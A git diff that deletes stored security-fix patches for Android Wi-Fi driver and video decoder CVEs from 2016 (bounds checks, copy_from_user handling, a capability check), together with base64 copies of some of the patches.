-+   * wlan private ioctl, the buffer size is much less than UINT_MAX, as a good
-+   * guess, now, it is assumed that the private command buffer size is no
-+   * greater than 4K (4096 bytes). So we use 4096 as the upper boundary for now.
-+   */
-+    if (len > MAX_USER_COMMAND_SIZE)
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "Invalid length");
-+        return NULL;
-+    }
-+
-+    ptr = kmalloc(len + 1, GFP_KERNEL);
-+    if (NULL == ptr)
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "unable to allocate memory");
-+        return NULL;
-+    }
-+
-+    if (copy_from_user(ptr, wrqu_data, len))
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "%s: failed to copy data to user buffer", __func__);
-+        kfree(ptr);
-+        return NULL;
-+    }
-+    ptr[len] = '\0';
-+    return ptr;
-+}
-+
-+/**---------------------------------------------------------------------------
-+
-   \brief hdd_wlan_get_version() -
- 
-    This function use to get Wlan Driver, Firmware, & Hardware Version.
-@@ -4220,15 +4270,13 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-     VOS_STATUS vstatus;
-     int sub_cmd = wrqu->data.flags;
-     int ret = 0; /* success */
-+    char *pBuffer = NULL;
-     hdd_adapter_t *pAdapter = (netdev_priv(dev));
-     hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
- #ifdef WLAN_FEATURE_VOWIFI
-     hdd_config_t  *pConfig = pHddCtx->cfg_ini;
- #endif /* WLAN_FEATURE_VOWIFI */
- 
--    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length);
--    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, extra);
--
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-         VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
-@@ -4236,15 +4284,30 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-         return -EBUSY;
-     }
- 
-+    /* ODD number is used for set, copy data using copy_from_user */
-+    pBuffer = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
-+                                              wrqu->data.length);
-+    if (NULL == pBuffer)
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "mem_alloc_copy_from_user_helper fail");
-+        return -ENOMEM;
-+    }
-+
-+    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-+              "%s: Received length %d", __func__, wrqu->data.length);
-+    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-+              "%s: Received data %s", __func__, pBuffer);
-+
-     switch(sub_cmd)
-     {
-        case WE_WOWL_ADD_PTRN:
-           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "ADD_PTRN");
--          hdd_add_wowl_ptrn(pAdapter, extra);
-+          hdd_add_wowl_ptrn(pAdapter, pBuffer);
-           break;
-        case WE_WOWL_DEL_PTRN:
-           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "DEL_PTRN");
--          hdd_del_wowl_ptrn(pAdapter, extra);
-+          hdd_del_wowl_ptrn(pAdapter, pBuffer);
-           break;
- #if defined WLAN_FEATURE_VOWIFI
-        case WE_NEIGHBOR_REPORT_REQUEST:
-@@ -4259,7 +4322,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-                 if( !neighborReq.no_ssid )
-                 {
-                    neighborReq.ssid.length = (wrqu->data.length - 1) > 32 ? 32 : (wrqu->data.length - 1) ;
--                   vos_mem_copy( neighborReq.ssid.ssId, extra, neighborReq.ssid.length );
-+                   vos_mem_copy( neighborReq.ssid.ssId, pBuffer, neighborReq.ssid.length );
-                 }
- 
-                 callbackInfo.neighborRspCallback = NULL;
-@@ -4277,10 +4340,10 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif
-        case WE_SET_AP_WPS_IE:
-           hddLog( LOGE, "Received WE_SET_AP_WPS_IE" );
--          sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), extra, wrqu->data.length );
-+          sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), pBuffer, wrqu->data.length );
-           break;
-        case WE_SET_CONFIG:
--          vstatus = hdd_execute_config_command(pHddCtx, extra);
-+          vstatus = hdd_execute_config_command(pHddCtx, pBuffer);
-           if (VOS_STATUS_SUCCESS != vstatus)
-           {
-              ret = -EINVAL;
-@@ -4293,6 +4356,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-            break;
-        }
-     }
-+    kfree(pBuffer);
-     return ret;
- }
- 
-@@ -5014,7 +5078,6 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-     tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter);
-     int sub_cmd = wrqu->data.flags;
--    int *value = (int*)extra;
-     int apps_args[MAX_VAR_ARGS] = {0};
-     int num_args = wrqu->data.length;
-     hdd_station_ctx_t *pStaCtx = NULL ;
-@@ -5035,7 +5098,14 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info
-     {
-        num_args = MAX_VAR_ARGS;
-     }
--    vos_mem_copy(apps_args, value, (sizeof(int)) * num_args);
-+
-+    /* ODD number is used for set, copy data using copy_from_user */
-+    if (copy_from_user(apps_args, wrqu->data.pointer, (sizeof(int)) * num_args))
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "%s: failed to copy data to user buffer", __func__);
-+        return -EFAULT;
-+    }
- 
-     if(( sub_cmd == WE_MCC_CONFIG_CREDENTIAL ) ||
-         (sub_cmd == WE_MCC_CONFIG_PARAMS ))
-@@ -6377,9 +6447,23 @@ static int iw_set_packet_filter_params(struct net_device *dev, struct iw_request
-         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpPacketFilterCfg pRequest = (tpPacketFilterCfg) extra;
-+    tpPacketFilterCfg pRequest = NULL;
-+    int ret;
- 
--    return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId);
-+    /* ODD number is used for set, copy data using copy_from_user */
-+    pRequest = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
-+                                               wrqu->data.length);
-+    if (NULL == pRequest)
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "mem_alloc_copy_from_user_helper fail");
-+        return -ENOMEM;
-+    }
-+
-+    ret = wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId);
-+    kfree(pRequest);
-+
-+    return ret;
- }
- #endif
- static int iw_get_statistics(struct net_device *dev,
-@@ -7053,10 +7137,10 @@ static int iw_set_band_config(struct net_device *dev,
-                            union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tANI_U8 *ptr = extra;
-+    tANI_U8 *ptr = NULL;
-     int ret = 0;
- 
--    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__);
-+    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: ", __func__);
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-@@ -7065,23 +7149,47 @@ static int iw_set_band_config(struct net_device *dev,
-         return -EBUSY;
-     }
- 
-+    /* ODD number is used for set, copy data using copy_from_user */
-+    ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
-+                                          wrqu->data.length);
-+    if (NULL == ptr)
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "mem_alloc_copy_from_user_helper fail");
-+        return -ENOMEM;
-+    }
-+
-     if (memcmp(ptr, "SETBAND ", 8) == 0)
-     {
-         /* Change band request received */
-         ret = hdd_setBand_helper(dev, ptr);
--        return ret;
--
-     }
--    return 0;
-+    kfree(ptr);
-+
-+    return ret;
- }
- 
- static int iw_set_power_params_priv(struct net_device *dev,
-                            struct iw_request_info *info,
-                            union iwreq_data *wrqu, char *extra)
- {
-+  int ret;
-+  char *ptr;
-   VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-                 "Set power params Private");
--  return iw_set_power_params(dev,info,wrqu,extra,0);
-+  /* ODD number is used for set, copy data using copy_from_user */
-+  ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
-+                                          wrqu->data.length);
-+  if (NULL == ptr)
-+  {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                "mem_alloc_copy_from_user_helper fail");
-+      return -ENOMEM;
-+  }
-+
-+  ret = iw_set_power_params(dev, info, wrqu, ptr, 0);
-+  kfree(ptr);
-+  return ret;
- }
- 
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0001.patch
deleted file mode 100644
index 626ed25f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From d541aecce07c65fee3ad3a4d900016e4d22f2b3d Mon Sep 17 00:00:00 2001
-From: Karthik Jadala <karthikjk@codeaurora.org>
-Date: Wed, 4 May 2016 11:15:45 +0530
-Subject: qcacld-2.0: Fix buffer overwrite problem in CCXBEACONREQ
-
-Set the number of IE fields to minimum of input data and
-SIR_ESE_MAX_MEAS_IE_REQS.
-Change-Id: Ie53cfec7872ab69530bbb8932f9f9e85fb319f92
-CRs-Fixed: 993561
----
- CORE/HDD/src/wlan_hdd_main.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index c3e3786..4d5a86c 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -5530,17 +5530,17 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue,
-     /*no argument followed by spaces*/
-     if ('\0' == *inPtr) return -EINVAL;
- 
--    /*getting the first argument ie measurement token*/
-+    /*getting the first argument ie Number of IE fields*/
-     v = sscanf(inPtr, "%31s ", buf);
-     if (1 != v) return -EINVAL;
- 
-     v = kstrtos32(buf, 10, &tempInt);
-     if ( v < 0) return -EINVAL;
- 
-+    tempInt = VOS_MIN(tempInt, SIR_ESE_MAX_MEAS_IE_REQS);
-     pEseBcnReq->numBcnReqIe = tempInt;
- 
--    VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO_HIGH,
--               "Number of Bcn Req Ie fields(%d)", pEseBcnReq->numBcnReqIe);
-+    hddLog(LOG1, "Number of Bcn Req Ie fields: %d", pEseBcnReq->numBcnReqIe);
- 
-     for (j = 0; j < (pEseBcnReq->numBcnReqIe); j++)
-     {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0002.patch
deleted file mode 100644
index 9e47b371..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 681c310490e49adc43065d1d11006c5a5dc43568 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@qca.qualcomm.com>
-Date: Tue, 7 Jun 2016 08:51:34 -0700
-Subject: qcacld-2.0: Validate CCXBEACONREQ IE fields
-
-Validate CCXBEACONREQ IE fields.
-
-Change-Id: Ie64a642abdd7923e91801186aa5743094a739fc9
-CRs-Fixed: 1025185
----
- CORE/HDD/src/wlan_hdd_main.c | 28 ++++++++++++++--------------
- 1 file changed, 14 insertions(+), 14 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index b3e855a..bd5c69d 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -4201,7 +4201,8 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue,
-                                      tCsrEseBeaconReq *pEseBcnReq)
- {
-     tANI_U8 *inPtr = pValue;
--    int tempInt = 0;
-+    uint8_t input = 0;
-+    uint32_t tempInt = 0;
-     int j = 0, i = 0, v = 0;
-     char buf[32];
- 
-@@ -4224,11 +4225,11 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue,
-     v = sscanf(inPtr, "%31s ", buf);
-     if (1 != v) return -EINVAL;
- 
--    v = kstrtos32(buf, 10, &tempInt);
-+    v = kstrtou8(buf, 10, &input);
-     if (v < 0) return -EINVAL;
- 
--    tempInt = VOS_MIN(tempInt, SIR_ESE_MAX_MEAS_IE_REQS);
--    pEseBcnReq->numBcnReqIe = tempInt;
-+    input = VOS_MIN(input, SIR_ESE_MAX_MEAS_IE_REQS);
-+    pEseBcnReq->numBcnReqIe = input;
- 
-     hddLog(LOG1, "Number of Bcn Req Ie fields: %d", pEseBcnReq->numBcnReqIe);
- 
-@@ -4249,24 +4250,24 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue,
-             v = sscanf(inPtr, "%31s ", buf);
-             if (1 != v) return -EINVAL;
- 
--            v = kstrtos32(buf, 10, &tempInt);
-+            v = kstrtou32(buf, 10, &tempInt);
-             if (v < 0) return -EINVAL;
- 
-             switch (i) {
-             case 0:  /* Measurement token */
--                if (tempInt <= 0) {
-+                if (!tempInt) {
-                    VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                             "Invalid Measurement Token(%d)", tempInt);
-+                             "Invalid Measurement Token: %d", tempInt);
-                    return -EINVAL;
-                 }
-                 pEseBcnReq->bcnReq[j].measurementToken = tempInt;
-                 break;
- 
-             case 1:  /* Channel number */
--                if ((tempInt <= 0) ||
-+                if ((!tempInt) ||
-                     (tempInt > WNI_CFG_CURRENT_CHANNEL_STAMAX)) {
-                    VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                             "Invalid Channel Number(%d)", tempInt);
-+                             "Invalid Channel Number: %d", tempInt);
-                    return -EINVAL;
-                 }
-                 pEseBcnReq->bcnReq[j].channel = tempInt;
-@@ -4276,19 +4277,18 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue,
-                 if ((tempInt < eSIR_PASSIVE_SCAN) ||
-                     (tempInt > eSIR_BEACON_TABLE)) {
-                    VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                             "Invalid Scan Mode(%d) Expected{0|1|2}", tempInt);
-+                             "Invalid Scan Mode: %d Expected{0|1|2}", tempInt);
-                    return -EINVAL;
-                 }
-                 pEseBcnReq->bcnReq[j].scanMode= tempInt;
-                 break;
- 
-             case 3:  /* Measurement duration */
--                if (((tempInt <= 0) &&
-+                if (((!tempInt) &&
-                     (pEseBcnReq->bcnReq[j].scanMode != eSIR_BEACON_TABLE)) ||
--                    ((tempInt < 0) &&
--                    (pEseBcnReq->bcnReq[j].scanMode == eSIR_BEACON_TABLE))) {
-+                    ((pEseBcnReq->bcnReq[j].scanMode == eSIR_BEACON_TABLE))) {
-                    VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                             "Invalid Measurement Duration(%d)", tempInt);
-+                             "Invalid Measurement Duration: %d", tempInt);
-                    return -EINVAL;
-                 }
-                 pEseBcnReq->bcnReq[j].measurementDuration = tempInt;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch
deleted file mode 100644
index fc49c935..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch
+++ /dev/null
@@ -1,16 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c
-index c67c975..35fa6cb 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.c
-+++ b/drivers/net/wireless/bcmdhd/wl_android.c
-@@ -1288,6 +1288,11 @@
- 		goto exit;
- 	}
- 
-+	if (!capable(CAP_NET_ADMIN)) {
-+		ret = -EPERM;
-+		goto exit;
-+	}
-+
- #ifdef CONFIG_COMPAT
- 	if (is_compat_task()) {
- 		compat_android_wifi_priv_cmd compat_priv_cmd;
diff --git a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch.base64
deleted file mode 100644
index ef7d8abc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC93bF9hbmRyb2lkLmMgYi9kcml2ZXJzL25ldC93aXJlbGVzcy9iY21kaGQvd2xfYW5kcm9pZC5jCmluZGV4IGM2N2M5NzUuLjM1ZmE2Y2IgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC93bF9hbmRyb2lkLmMKKysrIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2FuZHJvaWQuYwpAQCAtMTI4OCw2ICsxMjg4LDExIEBACiAJCWdvdG8gZXhpdDsKIAl9CiAKKwlpZiAoIWNhcGFibGUoQ0FQX05FVF9BRE1JTikpIHsKKwkJcmV0ID0gLUVQRVJNOworCQlnb3RvIGV4aXQ7CisJfQorCiAjaWZkZWYgQ09ORklHX0NPTVBBVAogCWlmIChpc19jb21wYXRfdGFzaygpKSB7CiAJCWNvbXBhdF9hbmRyb2lkX3dpZmlfcHJpdl9jbWQgY29tcGF0X3ByaXZfY21kOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch
deleted file mode 100644
index 420fbeff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 3b84707..977aef2 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -4272,110 +4272,7 @@
- 
-     DEBUG_PRINT_LOW("Set Config Called");
- 
--    if (configIndex == (OMX_INDEXTYPE)OMX_IndexVendorVideoExtraData) {
--        OMX_VENDOR_EXTRADATATYPE *config = (OMX_VENDOR_EXTRADATATYPE *) configData;
--        DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData called");
--        if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.avc") ||
--            !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mvc")) {
--            DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData AVC");
--            OMX_U32 extra_size;
--            // Parsing done here for the AVC atom is definitely not generic
--            // Currently this piece of code is working, but certainly
--            // not tested with all .mp4 files.
--            // Incase of failure, we might need to revisit this
--            // for a generic piece of code.
--
--            // Retrieve size of NAL length field
--            // byte #4 contains the size of NAL lenght field
--            nal_length = (config->pData[4] & 0x03) + 1;
--
--            extra_size = 0;
--            if (nal_length > 2) {
--                /* Presently we assume that only one SPS and one PPS in AvC1 Atom */
--                extra_size = (nal_length - 2) * 2;
--            }
--
--            // SPS starts from byte #6
--            OMX_U8 *pSrcBuf = (OMX_U8 *) (&config->pData[6]);
--            OMX_U8 *pDestBuf;
--            m_vendor_config.nPortIndex = config->nPortIndex;
--
--            // minus 6 --> SPS starts from byte #6
--            // minus 1 --> picture param set byte to be ignored from avcatom
--            m_vendor_config.nDataSize = config->nDataSize - 6 - 1 + extra_size;
--            m_vendor_config.pData = (OMX_U8 *) malloc(m_vendor_config.nDataSize);
--            OMX_U32 len;
--            OMX_U8 index = 0;
--            // case where SPS+PPS is sent as part of set_config
--            pDestBuf = m_vendor_config.pData;
--
--            DEBUG_PRINT_LOW("Rxd SPS+PPS nPortIndex[%u] len[%u] data[%p]",
--                    (unsigned int)m_vendor_config.nPortIndex,
--                    (unsigned int)m_vendor_config.nDataSize,
--                    m_vendor_config.pData);
--            while (index < 2) {
--                uint8 *psize;
--                len = *pSrcBuf;
--                len = len << 8;
--                len |= *(pSrcBuf + 1);
--                psize = (uint8 *) & len;
--                memcpy(pDestBuf + nal_length, pSrcBuf + 2,len);
--                for (unsigned int i = 0; i < nal_length; i++) {
--                    pDestBuf[i] = psize[nal_length - 1 - i];
--                }
--                //memcpy(pDestBuf,pSrcBuf,(len+2));
--                pDestBuf += len + nal_length;
--                pSrcBuf += len + 2;
--                index++;
--                pSrcBuf++;   // skip picture param set
--                len = 0;
--            }
--        } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg4") ||
--                !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg2")) {
--            m_vendor_config.nPortIndex = config->nPortIndex;
--            m_vendor_config.nDataSize = config->nDataSize;
--            m_vendor_config.pData = (OMX_U8 *) malloc((config->nDataSize));
--            memcpy(m_vendor_config.pData, config->pData,config->nDataSize);
--        } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.vc1")) {
--            if (m_vendor_config.pData) {
--                free(m_vendor_config.pData);
--                m_vendor_config.pData = NULL;
--                m_vendor_config.nDataSize = 0;
--            }
--
--            if (((*((OMX_U32 *) config->pData)) &
--                        VC1_SP_MP_START_CODE_MASK) ==
--                    VC1_SP_MP_START_CODE) {
--                DEBUG_PRINT_LOW("set_config - VC1 simple/main profile");
--                m_vendor_config.nPortIndex = config->nPortIndex;
--                m_vendor_config.nDataSize = config->nDataSize;
--                m_vendor_config.pData =
--                    (OMX_U8 *) malloc(config->nDataSize);
--                memcpy(m_vendor_config.pData, config->pData,
--                        config->nDataSize);
--                m_vc1_profile = VC1_SP_MP_RCV;
--            } else if (*((OMX_U32 *) config->pData) == VC1_AP_SEQ_START_CODE) {
--                DEBUG_PRINT_LOW("set_config - VC1 Advance profile");
--                m_vendor_config.nPortIndex = config->nPortIndex;
--                m_vendor_config.nDataSize = config->nDataSize;
--                m_vendor_config.pData =
--                    (OMX_U8 *) malloc((config->nDataSize));
--                memcpy(m_vendor_config.pData, config->pData,
--                        config->nDataSize);
--                m_vc1_profile = VC1_AP;
--            } else if ((config->nDataSize == VC1_STRUCT_C_LEN)) {
--                DEBUG_PRINT_LOW("set_config - VC1 Simple/Main profile struct C only");
--                m_vendor_config.nPortIndex = config->nPortIndex;
--                m_vendor_config.nDataSize  = config->nDataSize;
--                m_vendor_config.pData = (OMX_U8*)malloc(config->nDataSize);
--                memcpy(m_vendor_config.pData,config->pData,config->nDataSize);
--                m_vc1_profile = VC1_SP_MP_RCV;
--            } else {
--                DEBUG_PRINT_LOW("set_config - Error: Unknown VC1 profile");
--            }
--        }
--        return ret;
--    } else if (configIndex == OMX_IndexConfigVideoNalSize) {
-+    if (configIndex == OMX_IndexConfigVideoNalSize) {
-         struct v4l2_control temp;
-         temp.id = V4L2_CID_MPEG_VIDC_VIDEO_STREAM_FORMAT;
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch.base64
deleted file mode 100644
index d5f478b9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcCBiL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcAppbmRleCAzYjg0NzA3Li45NzdhZWYyIDEwMDY0NAotLS0gYS9tbS12aWRlby12NGwyL3ZpZGMvdmRlYy9zcmMvb214X3ZkZWNfbXNtODk3NC5jcHAKKysrIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZkZWMvc3JjL29teF92ZGVjX21zbTg5NzQuY3BwCkBAIC00MjcyLDExMCArNDI3Miw3IEBACiAKICAgICBERUJVR19QUklOVF9MT1coIlNldCBDb25maWcgQ2FsbGVkIik7CiAKLSAgICBpZiAoY29uZmlnSW5kZXggPT0gKE9NWF9JTkRFWFRZUEUpT01YX0luZGV4VmVuZG9yVmlkZW9FeHRyYURhdGEpIHsKLSAgICAgICAgT01YX1ZFTkRPUl9FWFRSQURBVEFUWVBFICpjb25maWcgPSAoT01YX1ZFTkRPUl9FWFRSQURBVEFUWVBFICopIGNvbmZpZ0RhdGE7Ci0gICAgICAgIERFQlVHX1BSSU5UX0xPVygiSW5kZXggT01YX0luZGV4VmVuZG9yVmlkZW9FeHRyYURhdGEgY2FsbGVkIik7Ci0gICAgICAgIGlmICghc3RyY21wKGRydl9jdHgua2luZCwgIk9NWC5xY29tLnZpZGVvLmRlY29kZXIuYXZjIikgfHwKLSAgICAgICAgICAgICFzdHJjbXAoZHJ2X2N0eC5raW5kLCAiT01YLnFjb20udmlkZW8uZGVjb2Rlci5tdmMiKSkgewotICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJJbmRleCBPTVhfSW5kZXhWZW5kb3JWaWRlb0V4dHJhRGF0YSBBVkMiKTsKLSAgICAgICAgICAgIE9NWF9VMzIgZXh0cmFfc2l6ZTsKLSAgICAgICAgICAgIC8vIFBhcnNpbmcgZG9uZSBoZXJlIGZvciB0aGUgQVZDIGF0b20gaXMgZGVmaW5pdGVseSBub3QgZ2VuZXJpYwotICAgICAgICAgICAgLy8gQ3VycmVudGx5IHRoaXMgcGllY2Ugb2YgY29kZSBpcyB3b3JraW5nLCBidXQgY2VydGFpbmx5Ci0gICAgICAgICAgICAvLyBub3QgdGVzdGVkIHdpdGggYWxsIC5tcDQgZmlsZXMuCi0gICAgICAgICAgICAvLyBJbmNhc2Ugb2YgZmFpbHVyZSwgd2UgbWlnaHQgbmVlZCB0byByZXZpc2l0IHRoaXMKLSAgICAgICAgICAgIC8vIGZvciBhIGdlbmVyaWMgcGllY2Ugb2YgY29kZS4KLQotICAgICAgICAgICAgLy8gUmV0cmlldmUgc2l6ZSBvZiBOQUwgbGVuZ3RoIGZpZWxkCi0gICAgICAgICAgICAvLyBieXRlICM0IGNvbnRhaW5zIHRoZSBzaXplIG9mIE5BTCBsZW5naHQgZmllbGQKLSAgICAgICAgICAgIG5hbF9sZW5ndGggPSAoY29uZmlnLT5wRGF0YVs0XSAmIDB4MDMpICsgMTsKLQotICAgICAgICAgICAgZXh0cmFfc2l6ZSA9IDA7Ci0gICAgICAgICAgICBpZiAobmFsX2xlbmd0aCA+IDIpIHsKLSAgICAgICAgICAgICAgICAvKiBQcmVzZW50bHkgd2UgYXNzdW1lIHRoYXQgb25seSBvbmUgU1BTIGFuZCBvbmUgUFBTIGluIEF2QzEgQXRvbSAqLwotICAgICAgICAgICAgICAgIGV4dHJhX3NpemUgPSAobmFsX2xlbmd0aCAtIDIpICogMjsKLSAgICAgICAgICAgIH0KLQotICAgICAgICAgICAgLy8gU1BTIHN0YXJ0cyBmcm9tIGJ5dGUgIzYKLSAgICAgICAgICAgIE9NWF9VOCAqcFNyY0J1ZiA9IChPTVhfVTggKikgKCZjb25maWctPnBEYXRhWzZdKTsKLSAgICAgICAgICAgIE9NWF9VOCAqcERlc3RCdWY7Ci0gICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcublBvcnRJbmRleCA9IGNvbmZpZy0+blBvcnRJbmRleDsKLQotICAgICAgICAgICAgLy8gbWludXMgNiAtLT4gU1BTIHN0YXJ0cyBmcm9tIGJ5dGUgIzYKLSAgICAgICAgICAgIC8vIG1pbnVzIDEgLS0+IHBpY3R1cmUgcGFyYW0gc2V0IGJ5dGUgdG8gYmUgaWdub3JlZCBmcm9tIGF2Y2F0b20KLSAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5uRGF0YVNpemUgPSBjb25maWctPm5EYXRhU2l6ZSAtIDYgLSAxICsgZXh0cmFfc2l6ZTsKLSAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5wRGF0YSA9IChPTVhfVTggKikgbWFsbG9jKG1fdmVuZG9yX2NvbmZpZy5uRGF0YVNpemUpOwotICAgICAgICAgICAgT01YX1UzMiBsZW47Ci0gICAgICAgICAgICBPTVhfVTggaW5kZXggPSAwOwotICAgICAgICAgICAgLy8gY2FzZSB3aGVyZSBTUFMrUFBTIGlzIHNlbnQgYXMgcGFydCBvZiBzZXRfY29uZmlnCi0gICAgICAgICA